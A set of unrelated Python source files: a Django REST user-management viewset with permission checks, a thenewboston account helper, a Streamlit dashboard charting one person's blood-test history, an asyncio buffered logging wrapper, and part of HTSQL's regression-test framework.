@action(detail=False, methods=['GET'])
def me(self, request):
"""Obtiene el usuario autenticado
Args:
request (Any): request
"""
usuario_request = Usuario.objects.get(user=request.user)
serializer = UsuarioSerializer(usuario_request, many=False)
return Response(serializer.data)
def list(self, request):
"""
list Lista todos los usuarios del sistema
Args:
request (Any): request
Returns:
json: lista de usuarios en formato json
"""
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("ver_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["ver_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuarios = Usuario.objects.all()
serializer = UsuarioSerializer(usuarios, many=True)
return Response(serializer.data)
def retrieve(self, request, pk=None):
"""
retrieve Obtiene un usuario mediante su pk
Args:
request (Any): request
pk (integer, opcional): primary key. Defaults to None.
Returns:
json: usuario obtenido en formato json
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("ver_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["ver_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuario = Usuario.objects.get(pk=pk)
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
@action(detail=True, methods=['POST'])
def activar(self, request, pk=None):
"""
activar Activa el usuario con la pk especificada
Args:
request (Any): request
pk (integer, opcional): primary key. Defaults to None.
Returns:
json: usuario activado en formato json
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("activar_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["activar_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuario = Usuario.objects.get(pk=pk)
usuario.activar()
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
@action(detail=True, methods=['POST'])
def desactivar(self, request, pk=None):
"""
desactivar Desactiva el usuario con la pk especificada
Args:
request (Any): request
pk (integer, opcional): primary key. Defaults to None.
Returns:
json: usuario desactivado en formato json
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
if not usuario_request.tiene_permiso("desactivar_usuarios"):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": ["desactivar_usuarios"]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
usuario = Usuario.objects.get(pk=pk)
if usuario_request == usuario:
response = {"message": "No puedes desactivarte a ti mismo"}
return Response(response, status=status.HTTP_409_CONFLICT)
if MiembroSprint.pertenece_a_sprint_activo(usuario):
response = {
"message": "Este usuario pertenece a un Sprint Activo",
"error": "conflict"
}
return Response(response, status=status.HTTP_409_CONFLICT)
usuario.desactivar()
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
@action(detail=True, methods=['POST'])
def asignar_rol(self, request, pk=None):
"""
asignar_rol Asigna un rol a un usuario
Args:
request (Any): request
pk (int, opcional): primary key. Defaults to None.
Returns:
json: html response
"""
try:
usuario_request = Usuario.objects.get(user=request.user)
usuario = Usuario.objects.get(pk=pk)
if not (usuario_request.tiene_permiso("ver_usuarios") and usuario_request.tiene_permiso("ver_roles")
and usuario_request.tiene_permiso("asignar_roles")):
response = {
"message": "No tiene permiso para realizar esta acción",
"permission_required": [
"ver_usuarios",
"ver_roles",
"asignar_roles"
]
}
return Response(response, status=status.HTTP_403_FORBIDDEN)
if usuario_request == usuario:
response = {"message": "No puede asignarse roles a sí mismo"}
return Response(response, status=status.HTTP_403_FORBIDDEN)
rol = Rol.objects.get(pk=request.data['id'])
usuario.asignar_rol(rol)
serializer = UsuarioSerializer(usuario, many=False)
return Response(serializer.data)
except Usuario.DoesNotExist:
response = {"message": "No existe el usuario"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
except Rol.DoesNotExist:
response = {"message": "No existe el rol"}
return Response(response, status=status.HTTP_404_NOT_FOUND)
|
python
|
from thenewboston.accounts.manage import create_account
from thenewboston.verify_keys.verify_key import encode_verify_key
def random_encoded_account_number():
signing_key, account_number = create_account()
return encode_verify_key(verify_key=account_number)
|
python
|
# -*- coding: utf-8 -*-
import streamlit as st
import numpy as np
import pandas as pd
import altair as alt
from io import BytesIO
def to_excel(df):
output = BytesIO()
writer = pd.ExcelWriter(output, engine='xlsxwriter')
df.to_excel(writer, index=True, sheet_name='杜子期血常规数据统计')
workbook = writer.book
worksheet = writer.sheets['杜子期血常规数据统计']
format1 = workbook.add_format({'num_format': '0.00'})
worksheet.set_column('A:Z', None, format1)
writer.save()
processed_data = output.getvalue()
return processed_data
st.set_page_config(layout='wide')
pd.set_option("display.max_colwidth", 1000, 'display.width', 1000)
def highlight_dataframe(s):
lst = []
for i in range(0, len(s) - 1, 2):
try:
tmp = float(s[i])
min, max = s[i+1].split('~')
if tmp < float(min):
lst.append('color: orange')
elif tmp > float(max):
lst.append('color: red')
else:
lst.append('')
except Exception as e:
lst.append('')
#print(s[i], s[i+1], e)
lst.append('')
return lst
items_map = {
'白细胞计数(WBC)(10^9/L)': '白细胞计数(WBC)(10^9/L)',
'淋巴细胞绝对值(LYM#)(10^9/L)': '淋巴细胞绝对值(LYM#)(10^9/L)',
'中性粒细胞绝对值(NEU#)(10^9/L)': '中性粒细胞绝对值(NEU#)(10^9/L)',
'单核细胞绝对值(MON#)(10^9/L)': '单核细胞绝对值(MON#)(10^9/L)',
'嗜酸性粒细胞绝对值(EOS#)(EOS#)(10^9/L)': '嗜酸性粒细胞绝对值(EOS#)(EOS#)(10^9/L)',
'嗜碱性粒细胞绝对值(BAS#)(BAS#)(10^9/L)': '嗜碱性粒细胞绝对值(BAS#)(BAS#)(10^9/L)',
'红细胞体积分布宽度-CV(RDW-CV)(%)': '红细胞体积分布宽度-CV(RDW-CV)(%)',
'红细胞体积分布宽度-SD(RDW-SD)(fL)': '红细胞体积分布宽度-SD(RDW-SD)(fL)',
'血小板体积分布宽度(PDW)(%)': '血小板体积分布宽度(PDW)(%)',
'血小板平均体积(MPV)(fL)': '血小板平均体积(MPV)(fL)',
'血小板压积(PCT)(%)': '血小板压积(PCT)(%)',
'嗜碱性粒细胞百分比(BAS%)(BAS%)(%)': '嗜碱性粒细胞百分比(BAS%)(BAS%)(%)',
'嗜酸性粒细胞百分比(EO%)(EOS%)(%)': '嗜酸性粒细胞百分比(EO%)(EOS%)(%)',
'红细胞计数(RBC)(10^12/L)': '红细胞计数(RBC)(10^12/L)',
'血红蛋白浓度(HGB)(g/L)': '血红蛋白浓度(HGB)(g/L)',
'红细胞压积(HCT)(%)': '红细胞压积(HCT)(%)',
'平均红细胞体积(MCV)(fL)': '平均红细胞体积(MCV)(fL)',
'平均红细胞血红蛋白含量(MCH)(MCH)(pg)': '平均红细胞血红蛋白含量(MCH)(MCH)(pg)',
'平均红细胞血红蛋白浓度(MCHC)(MCHC)(g/L)': '平均红细胞血红蛋白浓度(MCHC)(MCHC)(g/L)',
'血小板计数(PLT)(10^9/L)': '血小板计数(PLT)(10^9/L)',
'淋巴细胞百分比(LYM%)(%)': '淋巴细胞百分比(LYM%)(%)',
'中性粒细胞百分比(NEU%)(%)': '中性粒细胞百分比(NEU%)(%)',
'单核细胞百分比(MON%)(%)': '单核细胞百分比(MON%)(%)',
'大血小板比率(P-LC,R)': '大血小板比率(P-LC,R)',
'嗜碱性粒细胞计数(BASO#)(10^9/L)': '嗜碱性粒细胞绝对值(BAS#)(BAS#)(10^9/L)',
'血小板平均体积(MPV)(fL)': '血小板平均体积(MPV)(fL)',
'中性粒细胞计数(NEUT#)(10^9/L)': '中性粒细胞绝对值(NEU#)(10^9/L)',
'中性粒细胞百分比(NEUT%)(%)': '中性粒细胞百分比(NEU%)(%)',
'血小板压积(PCT)(%)': '血小板压积(PCT)(%)',
'血小板分布宽度(PDW)(%)': '血小板体积分布宽度(PDW)(%)',
'大血小板比率(P-LCR)': '大血小板比率(P-LC,R)',
'血小板总数(PLT)(10^9/L)': '血小板计数(PLT)(10^9/L)',
'红细胞计数(RBC)(10^12/L)': '红细胞计数(RBC)(10^12/L)',
'红细胞分布宽度CV(RDW-CV)(%)': '红细胞体积分布宽度-CV(RDW-CV)(%)',
'红细胞分布宽度-SD(RDW-SD)(fL)': '红细胞体积分布宽度-SD(RDW-SD)(fL)',
'单核细胞百分比(MONO%)(%)': '单核细胞百分比(MON%)(%)',
'单核细胞计数(MONO#)(10^9/L)': '单核细胞绝对值(MON#)(10^9/L)',
'平均红细胞体积(MCV)(fL)': '平均红细胞体积(MCV)(fL)',
'嗜碱性粒细胞百分比(BASO%)(%)': '嗜碱性粒细胞百分比(BAS%)(BAS%)(%)',
#'C-反应蛋白(CRP)(mg/L)',
'嗜酸性粒细胞计数(EO#)(10^9/L)': '嗜酸性粒细胞绝对值(EOS#)(EOS#)(10^9/L)',
'嗜酸性粒细胞百分比(EO%)(%)': '嗜酸性粒细胞百分比(EO%)(EOS%)(%)',
'红细胞压积(HCT)(%)': '红细胞压积(HCT)(%)',
'血红蛋白(HGB)(g/L)': '血红蛋白浓度(HGB)(g/L)',
'淋巴细胞计数(LYMPH#)(10^9/L)': '淋巴细胞绝对值(LYM#)(10^9/L)',
'淋巴细胞百分比(LYMPH%)(%)': '淋巴细胞百分比(LYM%)(%)',
'平均血红蛋白含量(MCH)(pg)': '平均红细胞血红蛋白含量(MCH)(MCH)(pg)',
'平均血红蛋白浓度(MCHC)(g/L)': '平均红细胞血红蛋白浓度(MCHC)(MCHC)(g/L)',
'白细胞数目(WBC)(10^9/L)': '白细胞计数(WBC)(10^9/L)'
}
items = set(items_map.values())
items_ref = [x + '_参考范围' for x in items]
df = pd.read_excel('杜子期血常规.xlsx', engine='openpyxl')
df_new = pd.DataFrame([], index=[rv for r in zip(items, items_ref) for rv in r])
for index, row in df.iteritems():
df_new[index] = ''
for i, item in enumerate(row):
if item in items_map:
try:
df_new[index][items_map[item]] = float(row[i + 1])
except:
df_new[index][items_map[item]] = np.nan
df_new[index][items_map[item] + '_参考范围'] = row[i + 2]
df_new.columns = np.array([x.date() for x in df_new.columns])
st.title('杜子期血常规数据统计')
df_new_str = df_new.astype(str)
st.write(df_new_str.style.apply(highlight_dataframe, axis=0))
st.download_button("Export to Excel", data=to_excel(df_new), file_name='杜子期血常规数据统计.xlsx')
chart_items = set()
#other = st.sidebar.expander('其他选项')
#if other.checkbox('显示原始数据'):
# st.write(df)
#st.sidebar.write('')
st.sidebar.write('请选择画图项')
if st.sidebar.checkbox('所有项'):
chart_items = set(items)
for item in items:
if st.sidebar.checkbox(item):
chart_items.add(item)
if chart_items:
df = df_new.loc[chart_items, :].T
#df.index = df.index.to_numpy(dtype='datetime64')
st.line_chart(df)
else:
df = df_new.loc['血小板计数(PLT)(10^9/L)', :].T
st.line_chart(df_new.loc['血小板计数(PLT)(10^9/L)'].T)
#df = df_new.loc['血小板计数(PLT)(10^9/L)'].T
df = df_new.T
df['date'] = df.index
st.vega_lite_chart(data=df, spec={
'mark': {
'type': 'line',
'point': True,
'tooltip': True
},
'encoding': {
'x': {
"type": "temporal",
#'timeUnit': 'date',
'field': 'date',
},
'y': {
"type": "quantitative",
'field': '血小板计数(PLT)(10^9/L)'
#'field': list(chart_items)
}
}
}, use_container_width=True)
st.write('相关系数矩阵')
df = df_new.filter(regex='^((?!_参考范围$).)*$', axis=0).astype(float)
st.write(df.T.corr())
cor_data = df.T.corr().stack().reset_index().rename(columns={0: 'correlation', 'level_0': 'variable', 'level_1': 'variable2'})
cor_data['correlation_label'] = cor_data['correlation'].map('{:.2f}'.format)
base = alt.Chart(cor_data).encode(
x='variable2:O',
y='variable:O'
)
# Text layer with correlation labels
# Colors are for easier readability
text = base.mark_text().encode(
text='correlation_label',
color=alt.condition(
alt.datum.correlation > 0.5,
alt.value('white'),
alt.value('black')
)
)
# The correlation heatmap itself
cor_plot = base.mark_rect().encode(
color='correlation:Q'
)
st.altair_chart(cor_plot + text, use_container_width=True)
|
python
|
import asyncio
import logging
import logging.handlers
import time
from contextlib import suppress
from typing import Optional, Union
from ..thread_pool import run_in_new_thread
def _thread_flusher(
handler: logging.handlers.MemoryHandler,
flush_interval: Union[float, int],
loop: asyncio.AbstractEventLoop,
) -> None:
def has_no_target() -> bool:
return True
def has_target() -> bool:
return bool(handler.target) # type: ignore
is_target = has_no_target
if isinstance(handler, logging.handlers.MemoryHandler):
is_target = has_target
while not loop.is_closed() and is_target():
with suppress(Exception):
if handler.buffer:
handler.flush()
time.sleep(flush_interval)
def wrap_logging_handler(
handler: logging.Handler,
loop: Optional[asyncio.AbstractEventLoop] = None,
buffer_size: int = 1024,
flush_interval: Union[float, int] = 0.1,
) -> logging.Handler:
loop = loop or asyncio.get_event_loop()
buffered_handler = logging.handlers.MemoryHandler(
buffer_size,
target=handler,
flushLevel=logging.CRITICAL,
)
run_in_new_thread(
_thread_flusher, args=(
buffered_handler, flush_interval, loop,
), no_return=True,
)
return buffered_handler
|
python
|
#
# Copyright (c) 2006-2013, Prometheus Research, LLC
#
"""
:mod:`htsql.ctl.regress`
========================
This module implements the `regress` routine.
"""
from .error import ScriptError
from .routine import Argument, Routine
from .option import (InputOption, TrainOption, PurgeOption,
ForceOption, QuietOption)
from .request import Request
from ..core.validator import (Validator, BoolVal, StrVal, WordVal,
ChoiceVal, IntVal, UFloatVal, DBVal, SeqVal,
MapVal, ClassVal, AnyVal)
from ..core.util import maybe, trim_doc, DB
import traceback
import io
import sys
import os, os.path
import shutil
import re
import difflib
import tempfile
import subprocess
import atexit
import time
import yaml, yaml.constructor
# Indicates that a field has no default value and therefore cannot be omitted.
MANDATORY_FIELD = object()
# Return values for `ask_*` methods indicating the user-chosen action.
DO_CONTINUE = object()
DO_DISCARD = object()
DO_HALT = object()
DO_RECORD = object()
DO_SAVE = object()
DO_SKIP = object()
class TermStringIO(io.StringIO):
"""
A readable file-like object with an "echo". Whenever some content is read
from it, the same content is echoed to the specified `output` stream.
Use :class:`TermStringIO` to preserve the content of interactive
sessions with pre-recorded input. Assign::
sys.stdout = StringIO.StringIO()
sys.stdin = TermStringIO(input, sys.stdout)
where `input` contains the pre-recorded input data. After the
session is done, the content of `sys.stdout` will be the same as
if the session was performed on a real terminal with echo enabled.
`buf` (a string)
The content of the stream.
`output` (a writable file-like object)
A stream that records data being read.
"""
def __init__(self, buf, output):
io.StringIO.__init__(self, buf)
self.output = output
def read(self, n=-1):
data = io.StringIO.read(self, n)
self.output.write(data)
return data
def readline(self, length=None):
data = io.StringIO.readline(self, length)
self.output.write(data)
return data
class Field(object):
"""
Describes a parameter of test data.
`attribute` (a string)
The name of the attribute that contains the field value.
`val` (:class:`htsql.validator.Validator`)
The validator for the field values.
`default`
The default value of the field. If not provided, the field
cannot be omitted. The `is_mandatory` attribute indicates if
the `default` value is provided.
`hint` (a string or ``None``)
A short one-line description of the field.
"""
# Use it to filter out `AnyField` instances.
is_any = False
def __init__(self, attribute, val,
default=MANDATORY_FIELD, hint=None):
# Sanity check on the arguments.
assert isinstance(attribute, str)
assert re.match(r'^[a-zA-Z_][0-9a-zA-Z_]*$', attribute)
assert isinstance(val, Validator)
assert isinstance(hint, maybe(str))
self.attribute = attribute
self.val = val
self.default = default
self.is_mandatory = (default is MANDATORY_FIELD)
self.hint = hint
def get_hint(self):
"""
Returns short one-line description of the field.
"""
return self.hint
def get_signature(self):
"""
Returns the field name.
"""
signature = self.attribute.replace('_', '-')
if self.is_mandatory:
signature += '*'
return signature
class AnyField(object):
"""
Indicates that test data may contain extra fields.
Add ``AnyField()`` to the `fields` list to indicate that YAML
representation of test data may contain some attributes not
described by other fields. These extra attributes will be
silently ignored.
"""
# Use it to filter out `AnyField` instances.
is_any = True
class TestData(object):
"""
Represents input or output data of a test case.
This is an abstract class. Create a subclass of :class:`TestData`
to describe input or output data for a specific test kind. You need
to specify the format of test data using the `fields` class attribute.
The `fields` attribute is a list of :class:`Field` instances. Each
field describes an attribute of test data.
Instances if :class:`TestData` are YAML-serializable. A instance of
a :class:`TestData` subclass is represented as a mapping YAML node.
The sets of keys and the format of the values come from the `fields`
list. Add an :class:`AnyField` instance to `fields` to indicate
that the mapping node may contain some extra fields (which are to
be ignored).
The constructor of :class:`TestData` accepts the following arguments:
`routine` (:class:`RegressRoutine`)
The routine that started the testing.
`case_class` (a subclass of :class:`TestCase`)
A test type. The object being constructed is an instance
of either `case_class.Input` or `case_class.Output`.
`attributes` (a dictionary)
A dictionary of attributes and their values. The set of
attributes is declared using the `fields` class variable.
`location` (a string or ``None``)
When the test data is loaded from a YAML file, `location`
indicates the location of the corresponding YAML node.
"""
fields = []
def __init__(self, routine, case_class, attributes, location=None):
# Sanity check on the arguments.
assert isinstance(routine, RegressRoutine)
assert issubclass(case_class, TestCase)
assert self.__class__ in [case_class.Input, case_class.Output]
assert isinstance(attributes, dict)
assert isinstance(location, maybe(str))
self.routine = routine
self.case_class = case_class
for name in attributes:
setattr(self, name, attributes[name])
self.location = location
self.init_attributes()
def init_attributes(self):
"""
Normalize field values.
"""
# Override in a subclass if you need to massage some field values.
def __str__(self):
# Produces the value of the first mandatory field.
title_attribute = None
for field in self.fields:
if field.is_any:
continue
if field.is_mandatory:
title_attribute = field.attribute
if title_attribute is None:
return ''
return repr(getattr(self, title_attribute))
def __repr__(self):
return "<%s.%s %s>" % (self.case_class.__name__,
self.__class__.__name__, self)
class TestCase(object):
"""
Describes a test type.
This an abstract class. Create a subclass of :class:`TestCase`
to describe a new type of test case. When subclassing, define
the following class attributes:
`name` (a string)
The name of the test.
`hint` (a string)
Short one-line description of the test.
`help` (a string)
Long description of the test.
`Input` (a subclass of :class:`TestData`)
The format of the test input.
`Output` (a subclass of :class:`TestData` or ``None``)
The format of the test output.
You also need to override methods :meth:`verify` and :meth:`train`
to specify how to execute the test case in a normal and in a train mode.
The constructor of :class:`TestCase` takes the following arguments:
`routine` (:class:`RegressRoutine`)
The routine that started the testing.
`state`
An object keeping the mutable testing state.
`input` (an instance of `Input`)
Input test data.
`output` (an instance of `Output` or ``None``)
Expected output test data.
"""
name = None
hint = None
help = None
# Override to declare the format of input and output test data.
Input = None
Output = None
@classmethod
def get_hint(cls):
"""
Returns short one-line description of the test case.
"""
return cls.hint
@classmethod
def get_help(cls):
"""
Returns long description of the test case.
"""
# Produce:
# {help}
#
# Input data:
# {field.signature} - {field.hint}
# ...
#
# Output data:
# {field.signature} - {field.hint}
# ...
lines = []
help = trim_doc(cls.help)
if help is not None:
lines.append(help)
for data_class in [cls.Input, cls.Output]:
if data_class is None:
continue
if lines:
lines.append("")
lines.append("%s data:" % data_class.__name__)
for field in data_class.fields:
if field.is_any:
continue
signature = field.get_signature()
hint = field.get_hint()
if hint is not None:
lines.append(" %-24s : %s" % (signature, hint))
else:
lines.append(" %s" % signature)
return "\n".join(lines)
def __init__(self, routine, state, input, output):
# Sanity check on the arguments.
assert isinstance(routine, RegressRoutine)
assert isinstance(state, routine.state_class)
if self.Input is None:
assert input is None
else:
assert isinstance(input, self.Input)
if self.Output is None:
assert output is None
else:
assert isinstance(output, maybe(self.Output))
self.routine = routine
self.state = state
self.input = input
self.output = output
# When the test case is in the quiet mode (indicated by `is_quiet`),
# all output is redirected to `quiet_buffer`. If for some reason
# the test case leaves the quiet mode, all the accumulated data
# is dumped to the standard output stream.
self.is_quiet = routine.quiet
self.quiet_buffer = io.StringIO()
def make_output(self, **attributes):
# Generate a new test output record with the given attributes.
return self.Output(self.routine, self.__class__, attributes)
@classmethod
def matches(cls, input, output):
"""
Checks if the given input and output records belong to the same
test case.
Note that we assume that both test input and test output have
a field with the same attribute name. This attribute is called
the key attribute. Input data matches output data when the
values of their key attribute are equal.
"""
# Sanity check on the arguments.
assert isinstance(input, maybe(TestData))
assert isinstance(output, maybe(TestData))
# `input` and `output` must be instances of `Input` and `Output`
# classes of the test case.
if cls.Input is None or cls.Output is None:
return False
if not isinstance(input, cls.Input):
return False
if not isinstance(output, cls.Output):
return False
# Find the key attribute: one that is declared both as an input field
# and as an output field.
key_attribute = None
input_attributes = [field.attribute for field in cls.Input.fields
if not field.is_any]
output_attributes = [field.attribute for field in cls.Output.fields
if not field.is_any]
for attribute in input_attributes:
if attribute in output_attributes:
key_attribute = attribute
break
if key_attribute is None:
return False
# `input` and `output` are matched when the values of their key
# attributes are equal.
if getattr(input, key_attribute) != getattr(output, key_attribute):
return False
return True
def get_suites(self):
"""
For container test cases, returns a set of test suites that belong
to the test case; otherwise returns an empty set.
"""
return set()
def out(self, *values, **options):
"""
Print values to the standard output stream.
:meth:`out` supports the same options as
:meth:`htsql.ctl.script.Script.out` and an extra option:
`indent`
A number of spaces to print before the first value,
default is ``0``.
"""
indent = options.pop('indent', 0)
if indent:
values = (' '*(indent-1),) + values
# If the test case is in the quiet mode, redirect the output
# to `quiet_buffer`.
if self.is_quiet and 'file' not in options:
options['file'] = self.quiet_buffer
self.routine.ctl.out(*values, **options)
def ask(self, message, choices):
"""
Asks the user a question; returns the reply.
`message` (a string)
The question.
`choices` (a list of strings)
The list of valid replies.
Typically the question has the form::
Press ENTER to perform <the default action>,
'x'+ENTER to perform <another action>,
'y'+ENTER to perform <another action>,
'z'+ENTER to perform <another action>.
In this case, `choices` should be equal to::
['', 'x', 'y', 'z']
The reply is stripped of leading and trailing whitespaces
and translated to the lower case.
"""
# Leave the quiet mode and print the question.
self.force_out()
self.out()
self.out(">>>", message)
line = None
# Repeat till we get a valid answer.
while line not in choices:
self.out("> ", end='')
line = self.routine.ctl.stdin.readline().strip().lower()
return line
def ask_halt(self):
"""
Ask if the user wants to halt the tests.
Returns `DO_HALT` or `DO_CONTINUE`.
"""
line = self.ask("Press ENTER to halt,"
" 'c'+ENTER to continue", ['', 'c'])
if line == '':
return DO_HALT
if line == 'c':
return DO_CONTINUE
def ask_record(self):
"""
Ask if the user wants to remember the new output of a test case.
Returns `DO_RECORD`, `DO_SKIP`, or `DO_HALT`.
"""
line = self.ask("Press ENTER to record,"
" 's'+ENTER to skip,"
" 'h'+ENTER to halt", ['', 's', 'h'])
if line == '':
return DO_RECORD
if line == 's':
return DO_SKIP
if line == 'h':
return DO_HALT
def ask_save(self):
"""
Ask if the user wants to save the updated output data.
Returns `DO_SAVE` or `DO_DISCARD`.
"""
line = self.ask("Press ENTER to save changes,"
" 'd'+ENTER to discard changes", ['', 'd'])
if line == '':
return DO_SAVE
if line == 'd':
return DO_DISCARD
def out_exception(self, exc_info):
"""
Prints an exception traceback.
"""
# Obey the quiet mode: redirect to `quiet_buffer` if necessary.
if self.is_quiet:
file = self.quiet_buffer
else:
file = self.routine.ctl.stdout
exc_type, exc_value, exc_traceback = exc_info
traceback.print_exception(exc_type, exc_value, exc_traceback,
file=file)
def out_sep(self, sep="-", length=72):
"""
Prints a separator: a long line of dashes.
"""
self.out(sep*length)
def out_header(self):
"""
Prints a nice header describing the test case.
"""
# Print:
# ---------------- ... -
# {NAME} {value}
# ({input.location})
# where {value} is the value of the first field of the input data.
self.out_sep()
if not self.input.fields or self.input.fields[0].is_any:
return
attribute = self.input.fields[0].attribute
value = getattr(self.input, attribute)
if value is not None:
if isinstance(value, list):
value = " ".join(str(item) for item in value)
self.out("%s %s" % (self.name.upper(), value), indent=2)
if self.input.location is not None:
self.out("(%s)" % self.input.location, indent=2)
def halted(self, message=None):
"""
Indicate that the test case failed and stop the tests.
"""
self.force_out()
if message is not None:
self.out(message)
self.state.failed += 1
self.state.is_exiting = True
def failed(self, message=None):
"""
Indicate that the test case failed; stop the tests unless
``--force`` or ``--train`` flags are set.
"""
self.force_out()
if message is not None:
self.out(message)
self.state.failed += 1
if not (self.routine.force or self.routine.train):
self.state.is_exiting = True
def updated(self, message=None):
"""
Indicate that the output of the test case has been updated.
"""
self.force_out()
if message is not None:
self.out(message)
self.state.updated += 1
def passed(self, message=None):
"""
Indicate that the test case passed.
"""
if message is not None:
self.out(message)
self.state.passed += 1
def force_out(self):
# Leave the quiet mode; flush the content of `quiet_buffer`
# to the standard output stream.
if not self.is_quiet:
return
self.is_quiet = False
buffer = self.quiet_buffer.getvalue()
self.routine.ctl.stdout.write(buffer)
self.routine.ctl.stdout.flush()
def verify(self):
"""
Executes the test case.
This method runs the test case with the given input data.
If the test completed without errors, compare the produced
output with the given expected output.
The test case fails if
- the test failed to complete without errors;
- or the expected test output is not provided;
- or the expected test output is not equal to the actual test output.
Some test cases may not generate output; in this case the test
passes if it is completed without errors.
"""
# Override when subclassing.
raise ScriptError("test %r is not implemented" % self.name)
def train(self):
"""
Executes the test case in the training mode; returns the output data.
In the train mode, when the expected test output is not equal to the
actual test output, the user is given a choice to update the expected
test output.
Note that when the output has not been changed or the user refused
to update it, the method must return the original output data,
``self.output``.
"""
# Override when subclassing if the test case requires test output data.
# Otherwise, just run the test case in the normal mode.
self.verify()
return None
class SkipTestCase(TestCase):
"""
Implements a skippable test case.
This is an abstract mixin class; subclasses should call :meth:`skipped`
to check if the test case is enabled or not.
"""
class Input(TestData):
fields = [
Field('skip', BoolVal(), False,
hint="""do not run the test"""),
Field('ifdef', SeqVal(StrVal()), None,
hint="""run only if a given toggle is active"""),
Field('ifndef', SeqVal(StrVal()), None,
hint="""run only if a given toggle is inactive"""),
]
def skipped(self):
"""
Checks if the test is disabled.
"""
# Verify if the test is unconditionally disabled.
if self.input.skip:
return True
# If a positive guard is set, check that at least one of the required
# toggles is active.
if self.input.ifdef is not None:
if not (self.state.toggles & set(self.input.ifdef)):
return True
# If a negative guard is set, check that none of the suppressed
# toggles is active.
if self.input.ifndef is not None:
if self.state.toggles & set(self.input.ifndef):
return True
# The test is not skipped.
return False
class DefineTestCase(SkipTestCase):
"""
Activates a named toggle.
"""
name = "define"
hint = """activate a toggle"""
help = """
This test case activates a toggle variable. A toggle allows one
to conditionally enable or disable some test cases using `ifdef`
and `ifndef` directives.
"""
class Input(TestData):
fields = [
Field('define', SeqVal(StrVal()),
hint="""activate the given toggles"""),
] + SkipTestCase.Input.fields
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Activates the toggles.
for toggle in self.input.define:
self.state.toggles.add(toggle)
class RunAndCompareTestCase(SkipTestCase):
"""
Implements common methods for a broad category of test cases.
This class implements common scenario: run the test, get the output
and compare it with the expected output.
This is an abstract class; create a subclass to implement a concrete
test case. The following methods has to be overridden: :meth:`execute`,
:meth:`render` and :meth:`differs`.
"""
def out_lines(self, lines, indent=0):
"""
Prints the lines with the specified identation.
"""
for line in lines:
# If `line` is UTF-8 encoded, print it literally;
# otherwise, replace special and non-ASCII characters
# with dots.
try:
line.decode('utf-8')
except UnicodeDecodeError:
line = re.sub(r'[\x00-\x1F\x7E-\xFF]', '.', line)
self.out(line.rstrip(), indent=indent)
def out_diff(self, old_output, new_output):
"""
Prints the delta between two test outputs.
"""
# Sanity check on the arguments.
assert isinstance(old_output, maybe(self.Output))
assert isinstance(new_output, self.Output)
# Render the outputs to the lists of lines.
old_lines = self.render(old_output)
new_lines = self.render(new_output)
# This function is supposed to be called in two cases:
# when there is no expected output, but only the actual output,
# and when the expected output differs from the actual output.
# However it may also happen that the function is called with
# two identical outputs, or that the `render` method hides
# the difference.
if old_lines is None:
self.out("=== the test output is new")
elif old_lines != new_lines:
self.out("=== the test output is changed")
else:
self.out("=== the test output is not changed")
self.out()
# Display the actual output if there is no expected output;
# otherwise display the delta between the expected and the actual
# output in the unified diff format.
if old_lines is None or old_lines == new_lines:
lines = new_lines
else:
diff = difflib.unified_diff(old_lines, new_lines,
n=2, lineterm='')
# Strip the leading `---` and `+++` lines of the unified diff.
lines = list(diff)[2:]
self.out_lines(lines, indent=2)
def render(self, output):
"""
Converts the output data to a list of lines.
"""
# Override when subclassing.
raise NotImplementedError()
def execute(self):
"""
Runs the test case; returns the produced output.
Returns ``None`` if an error occured when running the test case.
"""
# Override when subclassing.
raise NotImplementedError()
def differs(self, old_output, new_output):
"""
Checks if the actual test output differs from the expected test output.
"""
# Override when subclassing.
raise NotImplementedError()
def verify(self):
# Check if the test is skipped.
if self.skipped():
return
# Display the header.
self.out_header()
# When no expected test output, fail without executing the test.
if self.output is None:
return self.failed("*** no output data found")
# Execute the test; get the actual test output.
new_output = self.execute()
# `None` indicates that an error occurred; `execute()` is responsible
# for displaying an error message, so we just update the status and
# exit.
if new_output is None:
return self.failed()
# Compare the expected and the actual outputs, fail if they are
# different.
if self.differs(self.output, new_output):
self.out_diff(self.output, new_output)
return self.failed("*** unexpected test output")
# The actual output coincides with the expected output; we are good.
return self.passed()
def train(self):
# Check if the test is skipped.
if self.skipped():
return self.output
# Display the header.
self.out_header()
# Execute the test; get the actual test output.
new_output = self.execute()
# We need to handle three possible outcomes: an error occurred
# when running the test, the expected output differs from the
# actual output and the expected output coincides with the actual
# output.
# An error occurred while running the test.
if new_output is None:
# Ask the user if they want to stop the testing; the expected
# output is not updated.
reply = self.ask_halt()
if reply is DO_HALT:
self.halted("*** halting")
else:
self.failed()
return self.output
# The actual output differs from the expected output.
if self.differs(self.output, new_output):
# Display the difference.
self.out_diff(self.output, new_output)
# Ask the user if they want to record the new output,
# keep the old output, or halt the testing.
reply = self.ask_record()
if reply is DO_HALT:
self.halted("*** halting")
return self.output
if reply is DO_RECORD:
if self.output is None:
self.updated("*** recording new test output")
else:
self.updated("*** recording updated test output")
return new_output
self.failed()
return self.output
# The actual output coincides with the expected output; note that
# the caller checks if ``case.train() is case.output`` to learn
# if the output is updated.
self.passed()
return self.output
class AppTestCase(SkipTestCase):
"""
Configures the HTSQL application.
"""
